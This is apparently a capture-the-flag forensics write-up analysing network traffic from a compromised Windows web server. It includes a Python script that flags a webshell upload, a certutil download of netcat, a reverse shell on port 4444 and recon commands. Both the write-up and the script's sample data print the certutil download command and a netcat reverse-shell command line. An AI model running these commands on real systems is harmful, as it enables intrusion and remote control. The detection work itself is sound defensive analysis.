One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?
Filtering the capture down to HTTP traffic (Wireshark display filter: http) makes the relevant exchange easy to follow.
The first HTTP GET requests and responses involve the web server 22.214.171.124.
The attacker first uploaded a webshell; the request carries the parameter authKey=admin.
The attacker then executed a command through the webshell that downloaded netcat with certutil (a built-in Windows binary commonly abused as a download tool):
certutil -urlcache -split -f http://126.96.36.199/nc64.exe
Netcat then runs on the web server and connects back to the attacker's machine on TCP port 4444, a reverse shell.
Through that reverse shell the attacker ran whoami and ipconfig on the web server.
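The four steps above (webshell upload, certutil download, netcat callback on 4444, recon commands) can be checked mechanically instead of by scrolling through Wireshark. The script below is an added example written for this writeup, not part of the original analysis or of any tool it mentions. It assumes the capture was exported with tshark as tab-separated fields (frame.number, ip.src, ip.dst, tcp.srcport, tcp.dstport, http.request.method, http.request.uri, and a text payload column), and the sample rows embedded in it are constructed to mirror the activity described on this page; the attacker address 203.0.113.10, the upload path and the ephemeral ports are assumptions, as is the specific form of the upload request.

```python
"""Triage a tshark field export of the web-server PCAP for the webshell ->
certutil -> netcat reverse shell -> recon chain described in the writeup.

Assumed export command (assumption, adjust to taste):
  tshark -r capture.pcap -T fields -E separator=/t \
      -e frame.number -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport \
      -e http.request.method -e http.request.uri -e http.file_data
For the raw reverse-shell stream the last column is assumed to hold the
decoded TCP payload text (e.g. from a 'Follow TCP Stream' export).
"""
import re
from urllib.parse import parse_qs, unquote_plus

WEB_SERVER = "22.214.171.124"       # victim web server named in the writeup
SUSPICIOUS_PORTS = {4444}           # default port used by many nc reverse shells
RECON_CMDS = ("whoami", "ipconfig", "systeminfo", "net user")

# certutil abused as a downloader: certutil -urlcache [-split] -f <url> [file]
LOLBIN_DOWNLOAD = re.compile(r"certutil(?:\.exe)?\s+-urlcache\b.*?-f\s+(\S+)", re.I)
# netcat reverse shell: nc|nc64[.exe] <host> <port> -e <shell>
REVERSE_SHELL = re.compile(r"\bnc(?:64)?(?:\.exe)?\s+(\S+)\s+(\d+)\s+-e\b", re.I)

# Constructed sample export (NOT data from the original capture).
SAMPLE_EXPORT = "\n".join("\t".join(r) for r in [
    ("1", "203.0.113.10", WEB_SERVER, "49152", "80", "GET", "/", ""),
    ("2", "203.0.113.10", WEB_SERVER, "49153", "80", "POST", "/upload.aspx",
     "authKey=admin&filename=shell.aspx"),
    ("3", "203.0.113.10", WEB_SERVER, "49154", "80", "POST", "/shell.aspx",
     "authKey=admin&cmd=certutil+-urlcache+-split+-f+http%3A%2F%2F126.96.36.199%2Fnc64.exe"),
    ("4", WEB_SERVER, "126.96.36.199", "49200", "80", "GET", "/nc64.exe", ""),
    ("5", "203.0.113.10", WEB_SERVER, "49155", "80", "POST", "/shell.aspx",
     "authKey=admin&cmd=nc64.exe+203.0.113.10+4444+-e+cmd.exe"),
    ("6", WEB_SERVER, "203.0.113.10", "49201", "4444", "", "", ""),
    ("7", "203.0.113.10", WEB_SERVER, "4444", "49201", "", "", "whoami"),
    ("8", "203.0.113.10", WEB_SERVER, "4444", "49201", "", "", "ipconfig"),
])


def parse_export(text):
    """Turn the tab-separated tshark export into a list of row dicts."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split("\t")
        f += [""] * (8 - len(f))                    # tolerate missing trailing fields
        frame, src, dst, sport, dport, method, uri, payload = f[:8]
        rows.append({
            "frame": int(frame), "src": src, "dst": dst,
            "sport": int(sport) if sport else None,
            "dport": int(dport) if dport else None,
            "method": method, "uri": uri,
            "raw": payload,                          # as sent (URL-encoded for POST bodies)
            "text": unquote_plus(payload),           # decoded, for command matching
        })
    return rows


def triage(rows):
    """Return (frame, tag, detail) findings in capture order."""
    findings = []
    for r in rows:
        if r["method"] == "POST":
            params = parse_qs(r["raw"])
            if "authKey" in params:                  # webshell authentication parameter
                findings.append((r["frame"], "webshell-auth",
                                 f"authKey={params['authKey'][0]} to {r['uri']}"))
        m = LOLBIN_DOWNLOAD.search(r["text"])
        if m:
            findings.append((r["frame"], "lolbin-download", m.group(1)))
        m = REVERSE_SHELL.search(r["text"])
        if m:
            findings.append((r["frame"], "reverse-shell-cmd", f"{m.group(1)}:{m.group(2)}"))
        # The web server itself fetching an executable is the certutil download on the wire.
        if r["src"] == WEB_SERVER and r["method"] == "GET" and r["uri"].lower().endswith(".exe"):
            findings.append((r["frame"], "server-egress-download", f"http://{r['dst']}{r['uri']}"))
        # Outbound connection from the web server to a known reverse-shell port.
        if r["src"] == WEB_SERVER and r["dport"] in SUSPICIOUS_PORTS:
            findings.append((r["frame"], "reverse-shell-connect",
                             f"{r['src']} -> {r['dst']}:{r['dport']}"))
        # Commands typed into the reverse shell (non-HTTP traffic on the suspicious port).
        on_shell_port = r["sport"] in SUSPICIOUS_PORTS or r["dport"] in SUSPICIOUS_PORTS
        if not r["method"] and on_shell_port:
            cmd = r["text"].strip()
            if cmd.lower().startswith(RECON_CMDS):
                findings.append((r["frame"], "recon-command", cmd))
    return findings


if __name__ == "__main__":
    for frame, tag, detail in triage(parse_export(SAMPLE_EXPORT)):
        print(f"frame {frame:>4}  {tag:<24} {detail}")
```

On a real export, point parse_export at the file contents and adjust WEB_SERVER and SUSPICIOUS_PORTS for the environment; the port check will miss a reverse shell on an arbitrary port, so the command-line patterns (certutil -urlcache, nc ... -e) remain the more durable indicators.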